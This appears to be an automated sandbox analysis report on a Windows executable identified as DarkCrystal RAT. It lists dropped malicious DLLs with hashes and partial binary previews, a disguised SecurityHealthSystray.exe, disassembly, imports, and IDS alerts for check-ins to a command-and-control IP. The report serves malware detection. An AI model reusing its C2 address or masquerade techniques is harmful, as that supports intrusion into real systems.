                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                  C:\Users\user\Desktop\PxTXHLsG.log

                                                  Download File
                                                  Process:C:\Chaindriver.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):69632
                                                  Entropy (8bit):5.932541123129161
                                                  Encrypted:false
                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                  C:\Users\user\Desktop\TkRgFrOc.log

                                                  Download File
                                                  Process:C:\Recovery\Memory Compression.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):85504
                                                  Entropy (8bit):5.8769270258874755
                                                  Encrypted:false
                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                  C:\Users\user\Desktop\Zfmnrnxn.log

                                                  Download File
                                                  Process:C:\Chaindriver.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):85504
                                                  Entropy (8bit):5.8769270258874755
                                                  Encrypted:false
                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                  C:\Users\user\Desktop\viEjRGTv.log

                                                  Download File
                                                  Process:C:\Chaindriver.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):32256
                                                  Entropy (8bit):5.631194486392901
                                                  Encrypted:false
                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Windows\System32\CSCE25282B3313D430FBB6BBFE2CFE4882.TMP

                                                  Download File
                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                  File Type:MSVC .res
                                                  Category:dropped
                                                  Size (bytes):1224
                                                  Entropy (8bit):4.435108676655666
                                                  Encrypted:false
                                                  SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                  MD5:931E1E72E561761F8A74F57989D1EA0A
                                                  SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                  SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                  SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                  Malicious:false
                                                  Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

                                                  C:\Windows\System32\SecurityHealthSystray.exe

                                                  Download File
                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):4608
                                                  Entropy (8bit):3.9356479918748555
                                                  Encrypted:false
                                                  SSDEEP:48:6WJ7PtcjM7Jt8Bs3FJsdcV4MKe27KvqBHeOulajfqXSfbNtm:tPlPc+Vx9MKvk4cjRzNt
                                                  MD5:F8039D70F65A42398553592AFA2F0266
                                                  SHA1:BB05F093A2D84BFE254CD644FE816DF079B9D4D8
                                                  SHA-256:5AE5FD9D06A65508309039653EA0086019691F02B32CB59DC2888BC9A7CA3043
                                                  SHA-512:3431504A664526D2A82FAB28B0A0FF3B103AA811C504D5E848CBA6F08BABF1BE09B981703CFB0BE607C98F96B7508173B3C3821DC4B0F705FAD343C414868D8A
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Ivg.............................'... ...@....@.. ....................................@.................................<'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p'......H.......(!................................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................

                                                  \Device\Null

                                                  Download File
                                                  Process:C:\Windows\System32\w32tm.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):151
                                                  Entropy (8bit):4.827179091092449
                                                  Encrypted:false
                                                  SSDEEP:3:VLV993J+miJWEoJ8FXyVTtQv4uWRK4WR0XaNvpYVuWcnNvj:Vx993DEUFt5ud47n4bx
                                                  MD5:F467A4655120C2346AD5C2DB3C05C995
                                                  SHA1:1D26354DAD166E60F71E05B0B966A75982ADD2F7
                                                  SHA-256:B9793FE4B0AA5EC69A4AA989C3D7F98E5D29A9B2425B65AB13741F23725671B4
                                                  SHA-512:60B771AA6EE2673968A29445BDF03B948E31F94680D4537F0D6A70B39226AF9408FED2820E4B242D328E0CBA4842BF114F451F57F52018492EB5FD79EBB95CE8
                                                  Malicious:false
                                                  Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 02/01/2025 03:09:34..03:09:34, error: 0x80072746.03:09:39, error: 0x80072746.

                                                  Static File Info

                                                  General

                                                  File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                  Entropy (8bit):7.991955156889876
                                                  TrID:
                                                  • Win64 Executable GUI (202006/5) 92.65%
                                                  • Win64 Executable (generic) (12005/4) 5.51%
                                                  • Generic Win/DOS Executable (2004/3) 0.92%
                                                  • DOS Executable Generic (2002/1) 0.92%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:t8F7Ic986c.exe
                                                  File size:7'204'705 bytes
                                                  MD5:a4923d4db3234b3905ad3097cc03af46
                                                  SHA1:3e12ad372643b3c9d91053b91f61f8cd7e42118c
                                                  SHA256:4685860269353c0eaaec2e5da79cb35a475123a37fa6d77c4faf345840da2a10
                                                  SHA512:066ddbbe0b4bc88307126186dcbb7fdee75ea47755e5874fa4ee334bc406388629a2457ef507fbbdd7ffc5239f45319b14abac9caf74e318b7fb4521d5c4b980
                                                  SSDEEP:98304:chbl5D70z1Mb4rsJgNd1ezhQcSZcOb+sX1Zvbed4Z0FGRABTgtse6vzovk18:chbl5D70RMVhhQcERCsXDjyZkJMu
                                                  TLSH:0476335DA2A44CB9ECFB023EC495881ADBB178611781DB8B0770515B1FD76B26C3EF82
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................................-.....................,.............................................................Rich...........

                                                  File Icon

                                                  Icon Hash:07554d70e14d5317

                                                  Static PE Info

                                                  General

                                                  Entrypoint:0x14000c540
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x140000000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x665AC400 [Sat Jun 1 06:47:28 2024 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:5
                                                  OS Version Minor:2
                                                  File Version Major:5
                                                  File Version Minor:2
                                                  Subsystem Version Major:5
                                                  Subsystem Version Minor:2
                                                  Import Hash:f4f2e2b03fe5666a721620fcea3aea9b

                                                  Entrypoint Preview

                                                  Instruction
                                                  dec eax
                                                  sub esp, 28h
                                                  call 00007F9678E6F3ECh
                                                  dec eax
                                                  add esp, 28h
                                                  jmp 00007F9678E6F00Fh
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  dec eax
                                                  sub esp, 28h
                                                  call 00007F9678E6F964h
                                                  test eax, eax
                                                  je 00007F9678E6F1B3h
                                                  dec eax
                                                  mov eax, dword ptr [00000030h]
                                                  dec eax
                                                  mov ecx, dword ptr [eax+08h]
                                                  jmp 00007F9678E6F197h
                                                  dec eax
                                                  cmp ecx, eax
                                                  je 00007F9678E6F1A6h
                                                  xor eax, eax
                                                  dec eax
                                                  cmpxchg dword ptr [00034FACh], ecx
                                                  jne 00007F9678E6F180h
                                                  xor al, al
                                                  dec eax
                                                  add esp, 28h
                                                  ret
                                                  mov al, 01h
                                                  jmp 00007F9678E6F189h
                                                  int3
                                                  int3
                                                  int3
                                                  dec eax
                                                  sub esp, 28h
                                                  test ecx, ecx
                                                  jne 00007F9678E6F199h
                                                  mov byte ptr [00034F95h], 00000001h
                                                  call 00007F9678E6F771h
                                                  call 00007F9678E6FD78h
                                                  test al, al
                                                  jne 00007F9678E6F196h
                                                  xor al, al
                                                  jmp 00007F9678E6F1A6h
                                                  call 00007F9678E7DD0Fh
                                                  test al, al
                                                  jne 00007F9678E6F19Bh
                                                  xor ecx, ecx
                                                  call 00007F9678E6FD88h
                                                  jmp 00007F9678E6F17Ch
                                                  mov al, 01h
                                                  dec eax
                                                  add esp, 28h
                                                  ret
                                                  int3
                                                  int3
                                                  inc eax
                                                  push ebx
                                                  dec eax
                                                  sub esp, 20h
                                                  cmp byte ptr [00034F5Ch], 00000000h
                                                  mov ebx, ecx
                                                  jne 00007F9678E6F1F9h
                                                  cmp ecx, 01h
                                                  jnbe 00007F9678E6F1FCh
                                                  call 00007F9678E6F8DAh
                                                  test eax, eax
                                                  je 00007F9678E6F1BAh
                                                  test ebx, ebx
                                                  jne 00007F9678E6F1B6h
                                                  dec eax
                                                  lea ecx, dword ptr [00034F46h]
                                                  call 00007F9678E7DB02h

                                                  Data Directories

                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x3e0bc0x78.rdata
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x470000x36b4.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x430000x231c.pdata
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x4b0000x758.reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x3b4600x1c.rdata
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x3b3200x140.rdata
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x2c0000x438.rdata
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                  Sections

                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x10000x2afb00x2b00040bf1edebd1304ce1b08c50cb556d4dbFalse0.5458416606104651data6.5002315273868IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rdata0x2c0000x12f360x13000d9c5dd6baa4ff7123551997c8a84cae6False0.5160490337171053data5.827851897350369IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .data0x3f0000x33b80xe00ae0f42b168987b17129506ccc4960b21False0.13392857142857142firmware 32a2 vdf2d (revision 2569732096) \377\377\377\377 , version 256.0.512, 0 bytes or less, at 0xcd5d20d2 1725235199 bytes , at 0 0 bytes , at 0xffffffff 16777216 bytes1.8264700601019173IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .pdata0x430000x231c0x2400ffc5390666982cab67e3c9bf8e263bc3False0.4784071180555556data5.382434020909434IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  _RDATA0x460000x1f40x200771f0b097891d31289bb68f0eb426e66False0.529296875data3.713242247775091IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .rsrc0x470000x36b40x3800ccc25b13f665fc385c7eeb61c91cda58False0.92724609375data7.85808934891437IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc0x4b0000x7580x8007ecf18b15822e1aa4c79b9a361f07c79False0.546875data5.250941834312499IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                  Resources

                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                  RT_ICON0x470e80x30a5PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9967879225889343
                                                  RT_GROUP_ICON0x4a1900x14data1.05
                                                  RT_MANIFEST0x4a1a40x50dXML 1.0 document, ASCII text0.4694508894044857

                                                  Imports

                                                  DLLImport
                                                  USER32.dllCreateWindowExW, PostMessageW, GetMessageW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
                                                  COMCTL32.dll
                                                  KERNEL32.dllIsValidCodePage, GetStringTypeW, GetFileAttributesExW, HeapReAlloc, FlushFileBuffers, GetCurrentDirectoryW, GetACP, GetOEMCP, GetModuleHandleW, MulDiv, GetLastError, SetDllDirectoryW, CreateFileW, GetFinalPathNameByHandleW, CloseHandle, GetModuleFileNameW, CreateSymbolicLinkW, GetCPInfo, GetCommandLineW, GetEnvironmentVariableW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, CreateDirectoryW, GetTempPathW, WaitForSingleObject, Sleep, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LoadLibraryExW, SetConsoleCtrlHandler, FindClose, FindFirstFileExW, GetCurrentProcess, LocalFree, FormatMessageW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, WriteConsoleW, SetEndOfFile, GetProcAddress, GetSystemTimeAsFileTime, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, InitializeSListHead, IsDebuggerPresent, RtlUnwindEx, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, GetDriveTypeW, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, GetFullPathNameW, RemoveDirectoryW, FindNextFileW, SetStdHandle, DeleteFileW, ReadFile, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, CompareStringW, LCMapStringW
                                                  ADVAPI32.dllOpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
                                                  GDI32.dllSelectObject, DeleteObject, CreateFontIndirectW

                                                  Network Behavior

                                                  Suricata IDS Alerts

                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                  2025-01-02T07:42:12.937028+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449730185.158.202.5280TCP
                                                  2025-01-02T07:42:40.718432+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449737185.158.202.5280TCP
                                                  2025-01-02T07:42:47.937085+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449738185.158.202.5280TCP
                                                  2025-01-02T07:42:57.077732+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449740185.158.202.5280TCP
                                                  2025-01-02T07:43:05.374608+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449788185.158.202.5280TCP
                                                  2025-01-02T07:43:08.640348+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449809185.158.202.5280TCP
                                                  2025-01-02T07:43:10.452741+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449820185.158.202.5280TCP
                                                  2025-01-02T07:43:13.468391+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449841185.158.202.5280TCP
                                                  2025-01-02T07:43:15.952759+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449859185.158.202.5280TCP
                                                  2025-01-02T07:43:37.905923+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449995185.158.202.5280TCP
                                                  2025-01-02T07:43:46.015323+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.450013185.158.202.5280TCP
                                                  2025-01-02T07:43:49.327933+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.450014185.158.202.5280TCP
                                                  2025-01-02T07:43:52.952838+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.450015185.158.202.5280TCP

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Jan 2, 2025 07:42:12.222743034 CET4973080192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:42:12.228194952 CET8049730185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:42:12.228260994 CET4973080192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:42:12.228691101 CET4973080192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:42:12.234321117 CET8049730185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:42:12.578655005 CET4973080192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:42:12.583686113 CET8049730185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:42:12.863842010 CET8049730185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:42:12.937027931 CET4973080192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:42:12.998162985 CET8049730185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:42:13.140136957 CET4973080192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:42:13.354605913 CET4973080192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:42:40.029572010 CET4973780192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:42:40.034516096 CET8049737185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:42:40.034596920 CET4973780192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:42:40.034801960 CET4973780192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:42:40.039561987 CET8049737185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:42:40.390450954 CET4973780192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:42:40.395373106 CET8049737185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:42:40.671520948 CET8049737185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:42:40.718431950 CET4973780192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:42:40.802408934 CET8049737185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:42:40.843966961 CET4973780192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:42:40.979460955 CET4973780192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:42:47.238909006 CET4973880192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:42:47.243891954 CET8049738185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:42:47.243954897 CET4973880192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:42:47.244177103 CET4973880192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:42:47.248943090 CET8049738185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:42:47.593909025 CET4973880192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:42:47.598845959 CET8049738185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:42:47.888977051 CET8049738185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:42:47.937084913 CET4973880192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:42:48.019974947 CET8049738185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:42:48.062093019 CET4973880192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:42:48.092417002 CET4973880192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:42:56.373135090 CET4974080192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:42:56.378137112 CET8049740185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:42:56.378221989 CET4974080192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:42:56.378424883 CET4974080192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:42:56.383203983 CET8049740185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:42:56.742400885 CET4974080192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:42:56.747327089 CET8049740185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:42:57.033515930 CET8049740185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:42:57.077732086 CET4974080192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:42:57.166054010 CET8049740185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:42:57.218353987 CET4974080192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:42:57.234250069 CET4974080192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:42:58.218149900 CET4974780192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:42:58.223048925 CET8049747185.158.202.52192.168.2.4
